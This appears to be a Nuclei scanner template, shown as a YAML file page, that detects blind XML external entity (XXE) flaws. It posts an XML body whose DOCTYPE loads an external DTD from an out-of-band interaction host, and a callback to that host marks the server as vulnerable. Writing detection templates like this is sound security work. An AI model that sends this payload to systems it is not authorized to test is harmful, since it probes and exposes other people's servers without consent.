26 lines
515 B
YAML
26 lines
515 B
YAML
id: generic-blind-xxe
|
|
|
|
info:
|
|
name: Generic Blind XXE
|
|
author: geeknik
|
|
severity: high
|
|
tags: xxe,generic
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Referer: {{BaseURL}}
|
|
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
|
|
<foo>&e1;</foo>
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|